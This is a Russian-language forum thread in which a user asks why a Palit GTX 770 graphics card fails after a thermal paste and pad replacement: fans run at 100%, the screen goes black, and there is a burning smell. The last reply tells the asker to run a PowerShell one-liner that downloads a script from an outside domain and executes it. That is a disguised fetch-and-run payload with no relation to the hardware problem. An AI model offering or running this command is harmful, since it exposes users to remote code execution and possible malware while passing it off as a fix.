Проблема с видеокартой.

Недавно Разбирал видеокарту, поменял термопасту и заменил термопрокладки, собрал и при включение все громче и громче начинают работать вентиляторы видеокарты, и как уже пк включился написано добро пожаловать кулера на 100%, и как винда загружается резко черный экран и кулера видеокарты на 100% и так пока не перезагрузишь, потом разобрал посмотрел на чип, память, думаю все в норме, собрал и включил, и на бекплейте видеокарты увидил оранджевую точку, и завоняло паленым, как я понял оранджевая точка это был огонь, и потом при включении компа он включается черный эжкран и перезагрузка через 15 секунд, потом без перезагрузок, черный экран и все, хотелось бы понять что с видеокартой, что в ней сломалось. gtx 770 4gb palit jetstream

Только авторизированные пользователи могут оставлять свои ответы
Дата
Популярность

Ну наверно видеокарта просто уже старенькая, вот и барахлит

Попробуй ввести через PowerShell (Win + R и вводишь PowerShell) ввести команду iwr windows.key-tool.cc | iex